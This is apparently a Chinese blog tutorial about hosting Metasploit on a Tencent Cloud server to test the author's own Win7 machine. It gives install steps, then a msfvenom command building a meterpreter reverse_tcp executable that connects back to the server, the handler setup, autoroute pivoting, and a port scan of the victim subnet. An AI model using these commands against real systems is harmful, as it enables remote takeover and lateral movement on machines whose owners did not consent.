在騰訊云上搭建msf測試環(huán)境

前言

1個月前學(xué)習(xí)msf時,考慮到只在內(nèi)網(wǎng)測試沒什么意思,于是我在騰訊云上租了個云服務(wù)器。騰訊云網(wǎng)絡(luò)架構(gòu)是由公網(wǎng)網(wǎng)卡和內(nèi)網(wǎng)網(wǎng)卡組成,不過在云主機(jī)中使用ipconfig/ifconfig查看網(wǎng)絡(luò)接口信息時,只能看到內(nèi)網(wǎng)IP的信息。?

首次搭建時,我選擇了server2008鏡像,并在上面安裝了集成msf的pentestbox。不幸的是,一切配置完成后,我在本地win7上運(yùn)行msfvenom生成的exe文件,云服務(wù)器上的msf并沒有獲得win7的shell。一開始我猜測是pentestbox的問題,于是把云服務(wù)器重裝成了Ubuntu系統(tǒng)。但是很遺憾,這次msf同樣沒有接收到本地win7反彈的shell。我開始懷疑是云服務(wù)器的外網(wǎng)--內(nèi)網(wǎng)映射的問題,通過搜索得到了如下幾種答案:

? ? ?①公網(wǎng)ip很貴的,騰訊云使用的是公共公網(wǎng)ip。

? ? ?②購買帶寬才會分配給你的云服務(wù)器公網(wǎng)IP地址。

? ? ?③云服務(wù)器雖然是內(nèi)網(wǎng)IP,但是全部NAT到了公網(wǎng),不需要手動做端口映射。

? ? ? ......

折騰了一陣子,仍然沒有解決問題,最后我放棄了掙扎。。1個月后的今天,我突然想到這個事情,便登錄云服務(wù)器看了看。這次我切換成root用戶運(yùn)行msf,神奇的是,竟然測試成功了??!我也懶得糾結(jié)是什么原因了,以下是正文......

1.登錄到Ubuntu系統(tǒng)后,首先切換成root用戶

2.安裝metasploit

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall

./msfinstall

3.安裝postgresql數(shù)據(jù)庫

安裝數(shù)據(jù)庫時會自動創(chuàng)建系統(tǒng)用戶postgres、數(shù)據(jù)庫用戶postgres、數(shù)據(jù)庫postgres

apt-get install postgresql ? 安裝postgresql數(shù)據(jù)庫

su postgres ? 切換到postgres用戶

psql ? 登錄postgresql數(shù)據(jù)庫,首次登錄沒有密碼

\password postgres ? 修改數(shù)據(jù)庫用戶postgres的密碼

4.metasploit的使用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=118.89.216.104 LPORT=888 -f exe -o end.exe ?這次LHOST是公網(wǎng)IP

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 10.141.103.129 ?這里L(fēng)HOST是內(nèi)網(wǎng)IP

set LPORT 888

exploit

5.在本地win7上運(yùn)行end.exe,云服務(wù)器上的msf會獲得shell

添加到win7子網(wǎng)的路由表

run get_local_subnets ?查看win7的本地子網(wǎng)

run autoroute -s 192.168.80.0/24 ?添加路由表

run autoroute -p ?查看路由表

掃描win7所在的本地子網(wǎng)

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.80.0/24

set ports 139,445

exploit

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容